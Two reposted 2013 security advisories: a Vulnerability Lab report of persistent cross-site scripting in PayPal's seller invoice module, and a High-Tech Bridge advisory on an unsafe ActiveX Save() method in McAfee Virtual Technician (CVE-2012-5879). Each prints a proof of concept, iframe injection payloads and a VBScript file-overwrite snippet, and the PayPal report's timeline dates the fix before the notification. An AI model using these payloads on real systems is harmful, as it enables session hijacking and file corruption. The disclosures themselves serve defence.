Title: ====== Paypal Bug Bounty #6 - Persistent Web Vulnerability Date: ===== 2013-03-27 References: =========== http://www.vulnerability-lab.com/get_content.php?id=645 PayPal Security UID: ydh14ayfu VL-ID: ===== 645 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a Web Vulnerability in the official Paypal plaze ecommerce website application. Report-Timeline: ================ 2012-07-01: Researcher Notification & Coordination 2012-07-02: Vendor Notification 2012-08-13: Vendor Response/Feedback 2012-03-26: Vendor Fix/Patch 2012-03-27: Public Disclosure Status: ======== Published Affected Products: ================== PayPal Inc Product: Core Application 2012 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation vulnerability is detected in the official Paypal ecommerce website content management system for sellers. The bug allows remote attackers to implement/inject own malicious script code on the application side (persistent) of the paypal web service. The persistent vulnerability is located in the Seller Invoice module with the bound vulnerable sent an invoice, your invoice, subject, sent to & invoice number parameters. The vulnerability can be exploited by remote attackers with low required user inter action and privileged seller account. Successful exploitation of the vulnerability can lead to session hijacking (admin), account steal via persistent web attack or stable (persistent) context manipulation. Vulnerable Section(s): [+] Seller Vulnerable Module(s): [+] Invoice - Listing Vulnerable Parameter(s): [+] sent an invoice [+] your invoice [+] subject [+] sent to [+] invoice number field Proof of Concept: ================= The vulnerability can be exploited by remote attackers with Business (Seller) Account & low required user inter action. For demonstration or reproduce ... 1. To reproduce the vulnerability, the remote attacker (seller) creates an invoice by going to [Request Money] -> Create invoice 2. He injects in the input fields of sent an invoice, your invoice, subject, sent to & invoice number field own malicious script code like js or html 3. In Send to field, the attacker can choose the mails of users on paypal to send them directly the malicous invoice 4. When the user checks his inbox the malicious script code (html/js) gets executed [persistent] out of the listing web context Review: <tr> <td>Subject: </td><td> You sent an invoice (``>``<iframe src=``devscr-Dateien/a.x`` to<=`` td=``> </tr> </table> <div id=``email_body`` style=``height:300px``> <textarea style=``border:0; width:98%; height:300px; overflow:visible`` readonly=``readonly``> ----NextPart_048F8BC8A2197DE2036A Content-Transfer-Encoding: quoted-printable Content-Type: text/plain; charset=windows-1252 ---------------------------------------------------------------------- You sent an invoice ---------------------------------------------------------------------- Hello =22>=22<iframe src=3Dhttp://www.vuln-lab.com></iframe>, Your invoice (=22>=22<iframe src=``devscr-Dateien/www.htm`` was=`` just=`` sent=`` to=``">"< iframe`` ==`` please=`` note=`` that=`` it=`` may=`` take=`` a=`` few=`` moments=`` for=`` this=`` transaction=`` appear=``in`` your=`` account.=`` see=`` invoice:=``https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_inv-details &id=3DINV2-6G2=`` h-qwaa-ajup-rhnv=`` ------------------------------------------------------------- ---------=`` ">"<iframe=``src=3Dhttp://www.vuln-lab.com></iframe>=22``>=22<iframe = src=3Dhttp://www.vuln-lab.com></iframe> =22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe> ---------------------------------------------------------------------- Summary of your invoice ---------------------------------------------------------------------- Sent to: ``>``<iframe = src=3Dhttp://www.vuln-lab.com></iframe> test=40test.com Sent from: =22>=22<iframe src=``devscr-Dateien/www_003.htm``></iframe> the_st_1341106590_biz=40mail.com Invoice number: =22>=22<iframe src=``devscr-Dateien/www_004.htm`` date=`` payment=`` is=`` due:=`` jun=`` 30,=`` 2012= `` amount:=``244.00`` usd=`` see=`` the=`` invoice=`` as=`` your=`` recipient=`` sees=`` it=`` :=`` https://www.sandbox.paypal.com/us/cgi-bin/?cmd=3D_pay-inv&id=3DINV2-6G2H-QW=`` aa-ajup-rhnv=``20` ` ----------------------------------------------------------------------=`` help=`` center:=``20`` https:=`` www.sandbox.paypal.com=`` `` us=`` cgi-bin=`` helpweb?cmd=``3D_help`` security=`` please=`` don't=`` reply=`` to=`` this=`` email.=`` it'll=`` `` just=`` confuse=`` computer=`` that=``sent`` and=`` you=`` won't=`` get=`` a=`` response.=`` `` copyright=``A9`` paypal,=`` inc.=`` all=`` rights=`` reserved.=`` paypal=`` located=`` at=``2211`` n.=`` `` first=`` st.,=`` san=`` jose,=`` ca=`` 95131.=``20`` email=`` id=`` pp1558=`` ----nextpart_048f8bc8a2197de2036a=`` `` content-transfer-encoding:=`` quoted-printable=`` content-type:=`` text=`` html;=`` charset=``windows-1252`` <html=``><head title=3D=22PayPal=22/><body><div class=3D=22ppmail=22><style = type=3D=22text/css=22>=23emailWrapperTable h1, =23emailWrapperTable h2 = =7Bfont-family:Verdana,Arial;margin-bottom:2px; font-size:15px;=7D =23emailWrapperTable h3 =7Bfont-size:13px;=7D =23emailWrapperTable h4 =7Bfont-size:11px;=7D a =7Bcolor:=23084482; text-decoration:underline;=7D hr =7Bdisplay: none;=7D =2Esmall =7Bfont-size:10px;=7D =2Eppid =7Bcolor:=23757575;=7D p =7Bmargin:11px 0; padding:0;=7D </style> <=21--=5Bif gte mso 9=5D><style>.outlookFix =7Bfont-size:11px = =21important;=7D</style><=21=5Bendif=5D--> <table border=3D=220=22 cellpadding=3D=220=22 cellspacing=3D=220=22 = id=3D=22emailWrapperTable=22 style=3D=22font:11px Verdana, Arial, = Helvetica, sans-serif;color:=23333;=22 width=3D=22580=22><tr = valign=3D=22top=22><td colspan=3D=223=22><table border=3D=220=22 = cellpadding=3D=220=22 cellspacing=3D=220=22 width=3D=22100%=22 = style=3D=22margin-bottom:10px;=22><tr valign=3D=22bottom=22><td = align=3D=22left=22 width=3D=22253=22><span> </span></td><td = align=3D=22right=22 style=3D=22padding:0 4px 4px 0;=22><span = style=3D=22font:12px arial;font-style: italic;color: =23757575;=22>Powered = by</span></td><td align=3D=22left=22 width=3D=2289=22 = style=3D=22padding-right:13px;=22><img align=3D=22center=22 = height=3D=2220=22 = src=3D=22http://www.sandbox.paypal.com/en_US/i/logo/logo_paypal_76w_20h.gif= =22 border=3D=220=22 = alt=3D=22PayPal=22/></td></tr><tr><td/> </tr></table></td></tr><tr><td = colspan=3D=223=22><img height=3D=2213=22 = src=3D=22http://www.sandbox.paypal.com/en_US/i/scr/scr_emailTopCorners_580w= x13h.gif=22 border=3D=220=22 style=3D=22vertical-align:bottom=22 = alt=3D=22=22/></td></tr><tr><td width=3D=2212=22 = style=3D=22background:url(/i/scr/scr_emailLeftBorder_13wx1h.gif) left = repeat-y;border-left: 1px solid =23ddd;=22><i Risk: ===== The security risk of the persistent script code inject web vulnerability is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Ibrahim M. El-Sayed [the_storm] (storm@vulnerability-lab.com) Sursa: PayPal Sellers CMS Cross Site Scripting ? Packet Storm
-
McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method Advisory ID: HTB23128 Product: McAfee Virtual Technician (MVT) 6.5.0.2101 Vendor: McAfee Vulnerable Version(s): 6.5.0.2101 and probably prior Tested Version: 6.5.0.2101 on Windows 7 SP1 and Internet Explorer 9 Vendor Notification: November 19, 2012 Vendor Patch: March 15, 2013 Public Disclosure: March 27, 2013 Vulnerability Type: Exposed Unsafe ActiveX Method [CWE-618] CVE Reference: CVE-2012-5879 Risk Level: Medium CVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:N/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in McAfee Virtual Technician ActiveX control, which can be exploited by remote malicious person to overwrite arbitrary files with garbage data on a vulnerable system. 1) Insecure method in McAfee Virtual Technician ActiveX control: CVE-2012-5879 The vulnerability exists due to the ActiveX control including the insecure "Save()" method in "McHealthCheck.dll" DLL. This can be exploited to corrupt or create arbitrary files in the context of the current user. The following PoC code is available: <html> <h4>McAfee Virtual Technician [McHealthCheck.dll] v.6.5.0.2101</h4> <h5>This proof of concepts creates an arbitrary file in a system [Windows 7, SP1 with IE 9.0] by leveraging the McHealthCheck.dll ActiveX module and the method "Save()":</h5> <object classid='clsid:24565A99-ADDA-47B9-9E86-3C4C3360E256' id='target'></object> <input type="button" value="Boom!" language="VBScript" OnClick="CreateArbitraryFile()"> <script language="VBScript"> sub CreateArbitraryFile() arg1="FilePath\File_name_to_corrupt_or_create" target.Save arg1 End Sub </script> </html> Solution: Upgrade to McAfee Virtual Technician (MVT) 7.1 More Information: https://kc.mcafee.com/corporate/index?page=content&id=SB10040 ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23128 - https://www.htbridge.com/advisory/HTB23128 - McAfee Virtual Technician ActiveX control Insecure Method. [2] McAfee Virtual Technician - mvt.mcafee.com - McAfee Virtual Technician collects information on your computer system so that McAfee can diagnose and solve problems related to your McAfee software. [3] Common Vulnerabilities and Exposures (CVE) - CVE - Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Sursa: McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method